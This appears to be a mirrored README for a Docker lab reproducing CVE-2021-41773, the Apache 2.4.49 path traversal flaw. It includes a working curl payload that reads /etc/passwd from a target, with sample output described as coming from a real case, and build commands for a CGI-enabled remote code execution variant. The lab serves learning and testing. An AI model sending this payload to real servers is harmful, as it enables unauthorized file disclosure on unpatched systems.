CVE-2021-41773 PoC — Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49

Source

https://github.com/twseptian/cve-2021-41773-docker-lab

Associated Vulnerability

Title:Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)
Description:A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.

Description

Docker container  lab to play/learn with CVE-2021-41773

Readme

# Lab CVE-2021-41773

Container lab to play/learn with CVE-2021-41773

File disclosure:

```
$ docker build -t apache-default default_conf
$ docker run -dit --name apache-app -p 81:80 apache-default
```

PoC
```bash
curl -s --path-as-is "http://iptarget:80/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
```
output

**note:** The output comes from the a real case.
```bash
curl -s --path-as-is "http://iptarget:80/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:995::/var/lib/chrony:/sbin/nologin
centos:x:1000:1000:Cloud User:/home/centos:/bin/bash
mysql:x:997:994:MySQL server:/var/lib/mysql:/sbin/nologin
[REDACTED]
```

RCE (CGI enabled):
```
$ docker build -t apache-cgi cgi_mod_enable
$ docker run -dit --name apache-lab -p 82:80 apache-cgi
```

References
- [CVE-2021-41773: Path Traversal Zero-Day in Apache HTTP Server Exploited](https://www.tenable.com/blog/cve-2021-41773-path-traversal-zero-day-in-apache-http-server-exploited)
- [Apache HTTP Server CVE-2021-41773 Exploited in the Wild](https://www.rapid7.com/blog/post/2021/10/06/apache-http-server-cve-2021-41773-exploited-in-the-wild/)
- [CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)](https://seclists.org/oss-sec/2021/q4/20)

File Snapshot


 [4.0K]  /data/pocs/7627be7fe440105d4c9de35d459a86e1817cfd51
├── [4.0K]  cgi_mod_enable
│   ├── [  71]  Dockerfile
│   └── [ 20K]  httpd.conf
├── [4.0K]  default_conf
│   ├── [  71]  Dockerfile
│   └── [ 20K]  httpd.conf
└── [2.2K]  README.md

2 directories, 5 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!